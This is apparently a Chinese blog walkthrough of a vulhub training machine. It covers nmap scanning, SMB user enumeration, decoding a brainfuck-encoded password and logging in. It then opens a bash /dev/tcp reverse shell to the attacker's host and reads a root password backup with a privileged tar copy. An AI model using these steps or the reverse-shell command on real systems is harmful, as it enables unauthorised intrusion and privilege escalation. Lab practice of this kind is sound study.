渗透测试-vulhub靶机-帝国突围

本文描述了一次黑客入侵过程,使用Nmap进行半开和全端口扫描,发现Samba服务漏洞并利用Enum4linux枚举用户信息。通过脑fuck解密获取密码,登录并利用反弹shell获取管理员权限,最终找到密码文件提权成功。
摘要由CSDN通过智能技术生成

帝国突围

1.nmap 半开扫描

2.复制IP到浏览器

  1. 打开控制台发现brainfuck加密字符

  2. 使用brainfuck进行解密,得出密码

  3. 不知道有什么用,先用记事本保存起来

3.用dirb扫描工具进行扫描

  1. 网址里面没有有用信息

  2. 其他扫描网址的工具也没有

3.nmap 全端口全服务扫描

        

  1. 发现10000,20000端口的http服务开放

  2. 登录10000端口发现需要用https协议进行加密

  3. 所以需要用https的协议打开10000和20000端口的网址

  4. 发现10000端口和20000端口的页面一摸一样

4.枚举工具

  1. —— 利用Samba服务漏洞(文件共享服务可以使用 enum4linux 枚举信息)

  2. 工具介绍:Enum4linux是用于枚举windows和Linux系统上的SMB服务的工具。可以轻松的从与SMB服务有关的目标中快速提取信息。

  3. 功能

  4. 命令使用

     enum4linux 192.168.244.

  5. 结果,发现有一个名字叫做syber的本地用户

5.登录到赛博账户

  1. 结合之前发现的brainfuck解出来的密码,去10000和20000端口的网址去尝试登录,发现20000端口的登录了进去

  2. 左下角发现终端按钮

  3. 点击进去,登录到syber用户

  4. 进入后查看有什么可用文件,发现user.txt,打开后发现信息

  5. 翻译

  6. 找不到其他有用信息了

6.反弹shell,在kali中准备提权

  1. kali打开监听端口

  2. cyber终端反弹

     bash -i >/dev/tcp/192.168.244.129/9999 0>&1

  3. 查看内核版本,发现版本太高,不能使用内核漏洞

  4. kali准备提权,输入命令

  5. 找到管理员存放密码备份的文件

  6. 发现不能直接打开

  7. 把.old_pass.bak文件压缩到cyber的家目录下,在自己的家目录下解压,查看,

  8. ./tar -zcf yasuo.tar /var/backups/.pld_pass.bak
    
    ./tar -xvf yasuo.tar

  9. 打开文件,发现密码
  10. 登录root账户,成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值